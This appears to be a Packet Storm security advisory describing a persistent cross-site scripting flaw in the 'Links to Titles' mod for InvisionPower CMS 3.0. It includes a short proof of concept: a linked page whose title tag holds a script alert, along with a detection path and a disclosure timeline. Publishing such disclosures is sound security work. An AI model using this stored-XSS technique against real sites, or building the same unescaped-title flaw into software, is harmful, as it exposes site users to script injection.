InvisionPower CMS Links to Titles utility version 3.0 suffers from a persistent cross site scripting vulnerability.
d003bac19ce9abb550ac27edf8a886c7e70a1c1cf25d4cb98871573a9b3f7acaInvisionPower cms Links to Titles utility Presistent XSS
===========================================
#Author: UmPire
#Version: 3.0
(Full details for version 3.1 patch is not mentioned. It's suspicious to affect all versions.)
#Vendor URL: http://invisionpower.com
#Product URL: http://community.invisionpower.com/files/file/3784-links-to-titles/
#Tested: Windows 7
______________________________________________
IPB "Links to Title" mod converts links to the link's title. It converts "http://www.google.com" to "Google" and the href= remains http://www.google.com
The problem is that it doesn't convert html tags to safe html characters. So if we use an html code in the title of the source page, it will be executed in the InvisionPower cms which "Links to Title" is installed on.
______________________________________________
#Product Detection: http://localhost:80/admin/applications/forums/sources/classes/linkTitlesFunctions.php ~ 200 OK
#POC:
Enter a link in invision power cms: http://localhost:80/test.html
Contents of test.html:
<html>
<title>
<script>alert('xss')</script>
</title>
</html>
#Video:
https://www.youtube.com/watch?v=ap23bnsK8Vg
#Credits:
Iran Security Group - iransec.net
Thanks to Root.Smasher|Black V!per|ali ahmady|Mr.Moein|Sultan Brain|Alireza_Promis|M4hdi|Social Engineer|TaK.FaNaR|LinuxLover|Saeed.Jok3r
Email: ranrep0ker@yahoo.com
#TimeLine:
2014/04/30 --> Found the bug.
2014/05/03 --> Contacted IPS Official Site.(told me to contact the third-party author)
2014/05/04 --> Sent message to third-party author (programmer of "Links to Title") -> No reply
2014/05/05 --> Published the bug.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed